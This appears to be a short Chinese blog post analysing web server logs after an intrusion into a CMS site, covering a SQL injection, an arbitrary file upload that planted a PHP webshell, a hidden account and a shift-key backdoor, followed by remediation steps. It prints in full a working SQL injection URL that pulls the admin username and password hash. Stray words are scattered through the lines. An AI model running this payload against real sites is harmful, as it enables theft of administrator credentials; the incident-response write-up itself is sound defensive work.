一次簡單的日誌分析

從開始審計日誌(200狀態碼)發現sql注入payloadphp

 

 

利用一下該payload肯定該網站存在sql注入,且攻擊者利用該漏洞獲取到了後臺帳戶以及密碼mysql

注入點:http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=sql

 

Payload:安全

http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294app

 

 

 攻擊者在優化

[27/May/2019:15:50:07 +0800]到網站

 

27/May/2019:15:50:09 +0800]加密

進行了後臺掃描url

再翻看日誌發現文件上傳漏洞存在spa

url:/dede/file_manage_main.php?activepath=/uploads

此處存在任意文件上傳漏洞且攻擊者成功上傳PHP大馬

 

 

發現存在隱藏帳戶,而且留有5shift後門

 

 

 

 

修復方案:

一、刪除後門、

二、全局優化文件上傳限制,改成白名單上傳

4、對URL進行轉碼編譯

五、加強密碼難度,使用更安全的加密手段

6、在代碼層面進行優化,嚴格判斷文件及變量參數的引入,防止未知文件被包含產生威脅

升級cms版本、mysql版本、

 

升級優化以後

 

相關文章
相關標籤/搜索